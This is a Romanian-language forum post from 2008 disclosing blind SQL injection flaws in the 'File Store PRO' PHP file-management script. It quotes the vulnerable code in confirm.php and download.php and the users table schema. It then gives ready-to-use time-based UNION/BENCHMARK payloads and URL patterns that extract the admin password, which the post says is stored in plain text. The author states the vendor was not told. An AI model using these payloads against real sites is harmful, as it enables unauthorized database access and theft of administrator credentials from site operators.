vladiii Posted July 8, 2008 Report Share Posted July 8, 2008 - Necesita drept de admin.In /confirm.php:$SQL="SELECT `".DB_PREFIX."users`.*, `".DB_PREFIX."file_list`.`filename`, `".DB_PREFIX."file_list`.`descript` ";$SQL.=" FROM `".DB_PREFIX."file_list` LEFT JOIN `".DB_PREFIX."users` ON `".DB_PREFIX."file_list`.`user_id`=`".DB_PREFIX."users`.`id`";$SQL.=" WHERE `".DB_PREFIX."file_list`.`id`='".$id."'";if(!$mysql->query($SQL)){ exit($mysql->error);}if($mysql->num<=0){ exit("Record not found");}Mai sus in cod avem:if(isset($_GET["folder"]) && $_GET["folder"]!="") { $folder=$_GET["folder"];} else { exit("Bad Request"); }if(isset($_GET["id"]) && $_GET["id"]!="") { $id=$_GET["id"];} else { exit("Bad Request"); }// Validate all inputs// Added by SepedaTua on June 01, 2006 - [url]http://www.sepedatua.info/[/url]/********************** SepedaTua ****************************//* Fields:$folder$id*/$search = array ('@<script[^>]*?>.*?</script>@si', '@<[\/\!]*?[^<>]*?>@si', '@([\r\n])[\s]+@', '@&(quot|#34);@i', '@&(amp|#38);@i', '@&(lt|#60);@i', '@&(gt|#62);@i', '@&(nbsp|#160);@i', '@&(iexcl|#161);@i', '@&(cent|#162);@i', '@&(pound|#163);@i', '@&(copy|#169);@i', '@(\d+);@e');$replace = array ('', '', '\1', '"', '&', '<', '>', ' ', chr(161), chr(162), chr(163), chr(169), 'chr(\1)');$ffolder = $folder;$fid = $id;$folder = preg_replace($search, $replace, $folder);$id = preg_replace($search, $replace, $id);Filtrarea este deci de 2 bani... Trecand peste asta, sa vedem tabela cu useri:Create table fstore_users ( id Integer(11) NOT NULL AUTO_INCREMENT, real_name Varchar(128) , company Varchar(128) , address1 Varchar(128) , address2 Varchar(128) , city Varchar(128) , state Varchar(128) , postcode Varchar(128) , country Varchar(128) , telephone Varchar(128) , login Varchar(64) , password Varchar(64) , email Varchar(128) , level Integer(11) , confirm Char(1) DEFAULT 'N' , allow_upload Char(1) DEFAULT 'N' , subscription char(1) default 'N' , Primary Key (id));In sintaxa SQL vom avea 19 coloane. *=17 + 1 + 1.Sintaxa va fi:' UNION SELECT IF (SUBSTRING(password, 1, 1)='a', BENCHMARK(100000000, ENCODE('a','b')), 1 ),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from fstore_users where login='admin[url]http://site.xxx/confirm.php?folder=a&id=[/url][SQL]Partea frumoasa este ca parolele sunt tinute ca plain text in baza de date. Puteti downloada softul* de aici (versiunea trial, "full" costa 60$):[url]http://webscripts.softpedia.com/script/File-Management-Perl/-1-File-Store-PRO-45963.html[/url]*A aparut acum cateva zile, este nou.Necesita magic_quotes_gpc = off. Nu l-am contactat pe cel care se ocupa cu acest script. Nici la milw0rm nu am trimis.- Nu necesita drept de admin.In /download.php:if(!isset($_GET["sig"])) // direct download, no need to login$MustLogin=1|2|4;require_once("libs/header.php");if(!isset($_GET["sig"])) // direct download, no need to login$userlevel=$CurUser->getlevel();$SQL="SELECT * FROM `".DB_PREFIX."file_list` WHERE `id`='".$fileid."'";if(!$mysql->query($SQL)){ exit($mysql->error);}$fileid este preluat prin $_GET si i se aplica aceeasi filtrare. Sintaxa:' UNION SELECT IF (SUBSTRING(password, 1, 1)='b', BENCHMARK(100000000, ENCODE('a','b')), 1 ),2,3,4,5,6,7,8,9,10,11 from fstore_users where login='admin[url]http://site.xxx/download.php?id=[/url][SQL]Bafta !P.S. Scriptul este plin de blind sql injection ! Quote Link to comment Share on other sites More sharing options...